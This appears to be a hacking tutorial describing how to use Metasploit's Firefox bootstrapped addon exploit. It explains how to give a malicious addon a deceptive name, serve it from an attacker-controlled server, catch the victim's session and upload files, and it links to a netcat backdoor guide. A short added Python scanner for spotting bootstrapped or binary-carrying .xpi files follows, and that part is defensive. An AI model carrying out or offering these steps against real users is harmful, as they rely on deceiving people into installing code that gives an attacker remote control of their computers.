Type : Tutorial
Level : Medium
Attacker O.S : Backtrack 5R1
Victim O.S : Windows XP SP3
Vulnerable Application : none (the people are vulnerable in this case)
Exploit Credits : mihi
After a long time of busy days, I can finally write another tutorial about Windows hacking. Today's tutorial is about "Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution".
metasploit.com describes this vulnerability as follows:
This exploit dynamically creates a .xpi addon file. The resulting bootstrapped Firefox addon is presented to the victim via a web page with. The victim's Firefox browser will pop a dialog asking if they trust the addon. Once the user clicks "install", the addon is installed and executes the payload with full user permissions. As of Firefox 4, this will work without a restart as the addon is marked to be "bootstrapped". As the addon will execute the payload after each Firefox restart, an option can be given to automatically uninstall the addon once the payload has been executed.
This method targets users who are not aware of the security issues involved when they install addons into their browsers.
1. Prepare the attack from your Metasploit console (view picture below).
Use the Firefox XPI bootstrapped addon exploit and then set the payload (if you don't know which payload to use, you can list them with the show payloads command).
2. Next, you can view the available options with the show options command; I've already set the necessary options, as you can see in the picture below:
Information :
set addonname tweak firefox to load faster --> eye-catching name for social engineering purposes
set srvhost 192.168.8.93 --> IP address of the server that runs the exploit
set srvport 80 --> server port that serves the malicious website
set uripath firefox-tweaker --> makes the URL more friendly, like http://192.168.8.93/firefox-tweaker
set lhost 192.168.8.93 --> local IP address that receives the connection from the victim
set lport 443 --> port used to handle the connection from the victim
set target 0 --> sets the default target for this exploit (firefox)
3. If everything has been set up correctly, you can run the exploit command to start the exploit server that serves the malicious page.
4. When the user accesses the page http://192.168.8.93/firefox-tweaker :
and then clicks "Install Now"...
5. Our Metasploit console will show something interesting…
By using the sessions -l command, we can list the active sessions created.
6. We need to interact with the session by using sessions -i id_active_sessions to get access to the victim system and upload some files there.
Here is the victim's file explorer after I finished uploading some files:
7. After that, maybe you can view my other tutorial about setting up a backdoor here http://www.hacking-tutorial.com/computer/10-steps-to-use-netcat-as-a-backdoor-in-windows-7-system/
1. Make sure you install addons only from developers you trust, or at least learn about their background by googling them first.
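A downloaded addon can also be inspected before anyone clicks "install". The following is an added example, not part of the original tutorial or of Metasploit: it opens a legacy .xpi (a ZIP archive) and reports the traits described above, namely the bootstrapped flag in install.rdf, a bootstrap.js file, and native executables inside the archive. The function names and the sample archives are constructed for illustration.

```python
import io
import re
import zipfile

# Extensions a browser addon has little reason to carry.
NATIVE_EXT = (".exe", ".dll", ".scr", ".bat", ".cmd", ".vbs", ".ps1", ".sh")
# Element or attribute form of the bootstrapped flag in install.rdf.
BOOTSTRAP_RE = re.compile(
    rb"<em:bootstrap>\s*true\s*</em:bootstrap>|em:bootstrap\s*=\s*\"true\"", re.I)

def inspect_xpi(data: bytes) -> list[str]:
    """Return a list of findings for a legacy .xpi given as raw bytes."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["not a valid ZIP/XPI archive"]
    with zf:
        names = zf.namelist()
        if "install.rdf" in names and BOOTSTRAP_RE.search(zf.read("install.rdf")):
            findings.append("install.rdf marks the addon as bootstrapped (no restart needed)")
        if "bootstrap.js" in names:
            findings.append("bootstrap.js present (its code runs on install and each browser start)")
        for name in names:
            if name.endswith("/"):
                continue  # directory entry
            head = zf.open(name).read(4)
            if head[:2] == b"MZ" or head == b"\x7fELF":
                findings.append(f"native executable inside archive: {name}")
            elif name.lower().endswith(NATIVE_EXT):
                findings.append(f"script or binary by extension: {name}")
    return findings

def build_sample(bootstrapped: bool, with_binary: bool) -> bytes:
    """Constructed sample archive for the demo; it contains no working code."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        flag = b"<em:bootstrap>true</em:bootstrap>" if bootstrapped else b""
        zf.writestr("install.rdf", b"<RDF><Description>" + flag + b"</Description></RDF>")
        zf.writestr("chrome.manifest", b"content sample content/\n")
        if bootstrapped:
            zf.writestr("bootstrap.js", b"// constructed placeholder\n")
        if with_binary:
            zf.writestr("helper.bin", b"MZ\x90\x00" + b"\x00" * 16)  # PE magic only
    return buf.getvalue()

if __name__ == "__main__":
    for finding in inspect_xpi(build_sample(True, True)):
        print("FINDING:", finding)
```

The executable check reads file headers rather than trusting names, so a binary stored under a harmless-looking extension is still reported.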
Hope it's useful